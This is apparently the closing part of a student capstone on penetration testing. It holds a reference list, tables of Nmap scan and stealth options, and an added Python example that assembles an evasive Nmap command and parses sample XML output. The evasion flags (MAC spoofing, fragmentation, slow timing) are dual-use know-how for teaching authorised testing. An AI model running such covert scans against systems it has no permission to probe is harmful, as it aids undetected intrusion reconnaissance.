Allen, L., & Cardwell, K. (2016). Penetration Testing Execution Standard. Birmingham, UK:
Packt Publishing.
Andress, J., & Winterfeld, S. (2014). Cyber Warfare Techniques, Tactics and Tools for Security
Practitioners. Waltham: Syngress.
Aruba Networks. (2019). Working with Intrusion Detection. Retrieved from Aruba Networks
Tech Docs:
https://www.arubanetworks.com/techdocs/ArubaOS_63_Web_Help/Content/
ArubaFrameStyles/New_WIP/Intrusion_Detection.htm#new_wip_1365762209_1030491
Bahybars-Hawks, B. (2015). New Media Politics: Rethinking Activism and National Security in
Cyberspace. Newcastle, UK: Cambridge Scholars Publishing.
Beggs, R. (2017). Mastering Kali Linux for Advanced Penetration Testing (Second ed.).
Birmingham, UK: Packt Publishing.
Bejtlich, R. (2013). The Practice of Network Security Monitoring: Understanding Incident
Detection and Response. San Francisco, California, United States: No Starch Press.
Broad, J., & Bindner, A. (2014). Hacking with Kali: Practical Penetration Testing Techniques.
Waltham: Syngress.
Clercq, J. d. (2004). Windows Server 2003 Security Infrastructure: Core Security Features.
Amsterdam, Netherlands: Digital Press.
Condon, C. (2019). Metasploit Framework. Retrieved from GitHub:
https://github.com/rapid7/metasploit-framework/wiki
Crumpler, W., & Lewis, J. A. (2019). The Cybersecurity Workforce Gap. District of Columbia:
Center for Strategic & International Studies. Retrieved from
https://virginiacyberalliancecareers.org/wp-content/uploads/190129_The-Cybersecurity-
Workforce-Gap.pdf
Cylance Data Science Team. (2017). Introduction to Artificial Intelligence for Security
Professionals. Irvine: The Cylance Press.
Duric, Z. (2014). WAPTT - Web Application Penetration Testing Tool. Advances in Electrical
and Computer Engineering. Retrieved from Directory of Open Access Journals.
EC-Council. (2017). Ethical Hacking and Countermeasures: Web Applications and Data
Servers (Second ed.). Boston, MA: Cengage Learning.
EC-Council Press. (2017). Ethical Hacking and Countermeasures: Attack Phases (Second ed.).
Boston: Cengage Learning.
Engebretson, P. (2013). The Basics of Hacking and Penetration Testing: Ethical Hacking and
Penetration Testing Made Easy. Waltham: Syngress.
Fadyushin, V., & Popov, A. (2016). Building a Pentesting Lab for Wireless Networks.
Birmingham, UK: Packt Publishing.
Ford, V. (2017). Build Your Own Lab. Retrieved from National Cybersecurity Student
Organization: https://www.cyberstudents.org/blog-post/build-your-own-lab/
Gregg, M., & Watkins, S. (2006). Hack the Stack: Using Snort and Ethereal to Master The 8
Layers of An Insecure Network. Rockland, MA, United States: Syngress.
Hack the Box. (2019). About. Retrieved from Hack the Box: https://www.hackthebox.eu/
Halton, W., & Weaver, B. (2016). Kali Linux 2: Windows Penetration Testing. Birmingham,
UK: Packt Publishing.
IBM. (2019). Data Breach. Retrieved from IBM Security : https://www.ibm.com/security/data-
breach
Identity Theft Resource Center. (2018). 2017 Annual Data Breach Year-End Review. Retrieved
from ID Theft Center: https://www.idtheftcenter.org/2017-data-breaches/
IEEE. (2019). 802.11 Standard Details. Retrieved from IEEE Standards Association:
https://standards.ieee.org/standard/802_11-2016.html
International Information Systems Security Certification Consortium. (2018). Cybersecurity
Professionals Focus on Developing New Skills as Workforce Gap Widens. Retrieved
from ISC2: https://www.isc2.org/-/media/ISC2/Research/2018-ISC2-Cybersecurity-
Workforce-Study.ashx?
la=en&hash=4E09681D0FB51698D9BA6BF13EEABFA48BD17DB0
Johns, A. (2015). Mastering Wireless Penetration Testing for Highly Secured Environments.
Birmingham, UK: Packt Publishing.
Khan, E., & Khan, F. (2012). A Comparative Study of White Box, Black Box and Grey Box
Testing Techniques. Sikkim: International Journal of Advanced Computer Science and
Applications.
Kim, A. (2017). Even password protected Wi-Fi is unsafe, vulnerable to hacks: Researchers
[Internet]. Retrieved from ProQuest:
https://search-proquest-com.ezproxy.utica.edu/docview/1951664878
Lyon, G. (2008). Nmap Network Scanning. Sunnyvale, California, United States: Insecure.com
LLC.
Merriam-Webster. (2019). Internet. Retrieved from Merriam-Webster: https://www.merriam-
webster.com/dictionary/Internet
Morgan, S. (2017). Cybersecurity Jobs Report: 2017 Edition. Cybersecurity Ventures. Menlo
Park: Herjavec Group. Retrieved from
https://www.herjavecgroup.com/wp-content/uploads/2018/07/HG-and-CV-The-
Cybersecurity-Jobs-Report-2017.pdf
MRL. (2017). enum4linux. Retrieved from Portcullis Labs:
https://labs.portcullis.co.uk/tools/enum4linux/
Najera-Gutierrez, G., & Ansari, J. A. (2018). Web Penetration Testing with Kali Linux (Third
ed.). Birmingham, UK: Packt Publishing.
NIST. (2019). Blue Team. Retrieved from Computer Security Resource Center:
https://csrc.nist.gov/glossary/term/Blue-Team
NIST. (2019). Red Team. Retrieved from Computer Security Resource Center:
https://csrc.nist.gov/glossary/term/Red-Team
Offensive Security. (2019). Why Offensive Security. Retrieved from Offensive-Security:
https://www.offensive-security.com/why-offsec/
OWASP. (2019). Penetration Testing Methodologies. Retrieved from OWASP:
https://www.owasp.org/index.php/Penetration_testing_methodologies
Patel, R. (2013). Kali Linux Social Engineering : Effectively Perform Efficient and Organized
Social Engineering Tests and Penetration Testing Using Kali Linux. Birmingham, UK:
Packt Publishing.
Pauli, J. (2013). The Basics of Web Hacking : Tools and Techniques to Attack the Web.
Amsterdam, Netherlands: Syngress.
PCI Security Standards. (2019). Responding to a Data Breach . Retrieved from
https://www.pcisecuritystandards.org/documents/PCI_SSC_PFI_Guidance.pdf
Pentest Standard. (2012). PTES Technical Guidelines. Retrieved from Pentest-Standard:
http://www.pentest-standard.org/index.php/PTES_Technical_Guidelines#Identifying_IP_
Ranges
Pentest-Standard. (2012). Cracking Passwords. Retrieved from Penetration Testing Execution
Standard:
http://www.pentest-standard.org/index.php/PTES_Technical_Guidelines#WPA-
PSK.2F_WPA2-PSK
Psiinon. (2015). OWASP ZAP User Guide. Retrieved from Github:
https://github.com/zaproxy/zap-core-help/wiki
Sanabria, E. (2018). Why the Best Defense Is a Good Offensive Security Strategy. Retrieved from
Security Intelligence: https://securityintelligence.com/why-the-best-defense-is-a-good-
offensive-security-strategy/
Sanders, C. (2017). Practical Packet Analysis. San Francisco, California, United States: No
Starch Press.
Sharma, H. (2017). Kali Linux - An Ethical Hacker's Cookbook. Birmingham, UK: Packt
Publishing.53
Sivarajan, S., Chaturvedi, S., Shetty, A., Parikh, K., & Youe, R. (2015). Getting Started with
Windows Server Security. Birmingham, UK: Packt Publishing.
Sood, A., & Enbody, R. (2014). Targeted Cyber Attacks. Waltham, Massachusetts, United
States: Syngress.
Stamparm. (2014). SQLMap Features. Retrieved from Github:
https://github.com/sqlmapproject/sqlmap/wiki/Features
Steube, J. (2019). Retrieved from Hashcat: Advanced Password Recovery:
https://hashcat.net/hashcat/
Sullo, C. (2019). Nikto. Retrieved from Github: https://github.com/sullo/nikto
Teixeira, D., Singh, A., & Agarwal, M. (2018). Metasploit Penetration Testing CookBook (Third
Edition ed.). Birmingham, UK: Packt Publishing.
Velu, V. K. (2017). Mastering Kali Linux for Advanced Penetration Testing. Birmingham, UK:
Packt Publishing.
Yerrid, K. (2013). Instant Netcat Starter. Birmingham, UK: Packt Publishing.
Appendix A
Table 1 - Example of Basic Nmap Command Options
Option   Example in a command        Description
-A       nmap -A 192.168.1.1         Enables OS detection, version detection, script scanning, and traceroute
-sV      nmap -sV 192.168.1.1        Attempts to determine the version of the service running on each open port
-sC      nmap -sC 192.168.1.1        Scans with the default NSE script set; considered useful for discovery and safe
-f       nmap -f 192.168.1.1         The requested scan (including ping scans) uses tiny fragmented IP packets, which are harder for packet filters to inspect
-v       nmap -v 192.168.1.1         Increases the verbosity level (use -vv or more for greater effect)
-h       nmap -h                     Prints the Nmap help screen, which lists many options
-p       nmap -p 80 192.168.1.1      Specifies which port(s) to scan
Source: (Lyon, 2008)
Table 2 - Nmap Stealth Scanning Options
Option                             Description
--spoof-mac Cisco                  Uses a random MAC address with a Cisco vendor prefix in the packets sent, so the scan appears to come from a Cisco device (requires raw-packet privileges)
--data-length 24                   Appends 24 random bytes to most packets sent, so probes do not match the size signature of an unpadded Nmap scan
-T paranoid                        Sets the timing template to its slowest setting (equivalent to -T0)
--max-hostgroup                    Limits the number of hosts scanned in parallel
--max-parallelism or --scan-delay  Both limit the number of probes outstanding or the rate at which they are sent, reducing the packet rate so the scan blends in with normal traffic
-Pn (older syntax -PN)             Skips host discovery (pinging) and treats every target as up; the ping phase can otherwise expose the scan
-f                                 Fragments packets to obscure the intentions of the scan
Source: (Beggs, 2017, pp. 66-72)
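The two tables above list the options individually. The following example, added here and not part of the original capstone, shows how a tester would combine them: one function assembles the argv for a version scan (Table 1) with or without the stealth options (Table 2), and a second parses Nmap's XML output (-oX) into a list of open ports with product and version strings. The XML sample is constructed for the example, not a real scan, and is abbreviated to the elements the parser reads; running a real scan requires Nmap installed and, for the raw-packet options (-f, --spoof-mac), root privileges.

```python
"""Compose an Nmap command from the Table 1 / Table 2 options and parse
the -oX (XML) output of a version scan.  Added example, not the author's
code.  SAMPLE_XML is a constructed, abbreviated nmap -sV -oX output."""
import shlex
import subprocess
import xml.etree.ElementTree as ET
from typing import Dict, List, Optional

# Constructed sample of `nmap -sV -oX - 192.168.1.1` output (not a real scan).
# Element and attribute names follow Nmap's XML output format.
SAMPLE_XML = """<nmaprun scanner="nmap" args="nmap -sV -oX - 192.168.1.1">
<host><status state="up" reason="syn-ack"/>
<address addr="192.168.1.1" addrtype="ipv4"/>
<ports>
<port protocol="tcp" portid="22"><state state="open" reason="syn-ack"/>
<service name="ssh" product="OpenSSH" version="7.9p1" conf="10"/></port>
<port protocol="tcp" portid="80"><state state="open" reason="syn-ack"/>
<service name="http" product="nginx" version="1.14.2" conf="10"/></port>
<port protocol="tcp" portid="443"><state state="closed" reason="reset"/>
<service name="https" conf="3"/></port>
</ports></host></nmaprun>"""


def build_scan_argv(target: str, ports: Optional[str] = None,
                    stealth: bool = False) -> List[str]:
    """Return the argv for a version scan (-sV, XML to stdout).  With
    stealth=True the Table 2 options are added: no ping, fragmented packets,
    slowest timing, 24 random padding bytes, one host at a time, a delay
    between probes, and a Cisco-vendor MAC (raw-packet options need root)."""
    argv = ["nmap", "-sV", "-oX", "-"]
    if ports:
        argv += ["-p", ports]          # -p from Table 1, e.g. "22,80,443"
    if stealth:
        argv += ["-Pn", "-f", "-T", "paranoid", "--data-length", "24",
                 "--max-hostgroup", "1", "--scan-delay", "1s",
                 "--spoof-mac", "Cisco"]
    argv.append(target)
    return argv


def parse_open_services(xml_text: str) -> List[Dict[str, str]]:
    """Return one record per open port on each host that is up: address,
    port, protocol, and the service name/product/version -sV reported.
    Closed and filtered ports are skipped."""
    root = ET.fromstring(xml_text)
    found: List[Dict[str, str]] = []
    for host in root.iter("host"):
        status = host.find("status")
        if status is None or status.get("state") != "up":
            continue
        addr = next((a.get("addr", "") for a in host.findall("address")
                     if a.get("addrtype") in ("ipv4", "ipv6")), "")
        for port in host.iter("port"):
            state = port.find("state")
            if state is None or state.get("state") != "open":
                continue
            svc = port.find("service")
            get = (lambda k: svc.get(k, "")) if svc is not None else (lambda k: "")
            found.append({"host": addr,
                          "port": port.get("portid", ""),
                          "proto": port.get("protocol", ""),
                          "service": get("name"),
                          "product": get("product"),
                          "version": get("version")})
    return found


def run_scan(argv: List[str]) -> List[Dict[str, str]]:
    """Run Nmap with the given argv (Nmap must be installed) and parse its XML."""
    proc = subprocess.run(argv, capture_output=True, text=True, check=True)
    return parse_open_services(proc.stdout)


if __name__ == "__main__":
    # Show the assembled stealth command, then parse the constructed sample.
    print(shlex.join(build_scan_argv("192.168.1.1", ports="22,80,443", stealth=True)))
    for rec in parse_open_services(SAMPLE_XML):
        line = f"{rec['host']}:{rec['port']}/{rec['proto']} {rec['service']}"
        print(f"{line} {rec['product']} {rec['version']}".rstrip())
```

On a live engagement the stealth argv is passed to run_scan(); the per-port records are what a tester carries into the enumeration phase (matching product and version strings against known issues), which is why the parser keeps product and version as separate fields rather than a single banner string.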
Appendix B
Figure 1. Nikto Options 1
Note: This illustrates the options that Nikto offers when performing a scan
Figure 2. Nikto Options 2
Note: This illustrates the rest of the Nikto options when performing a scan
Figure 3. ARP Poisoning Before and After
Note: This illustrates how network traffic between two devices changes when an ARP poisoning
attack has been performed
Figure 4. Enum4Linux Help Page Output
Note: This illustrates the output of the help page for enum4linux. This shows the options
available when performing enumeration with enum4linux.
Figure 5. Syntax for Metasploit
Note: This illustrates the syntax for Metasploit Framework command-line usage
Figure 6. Spear Phishing Model: Targeted Cyber Attack
Note: This figure illustrates the spear phishing attack model used to launch a targeted attack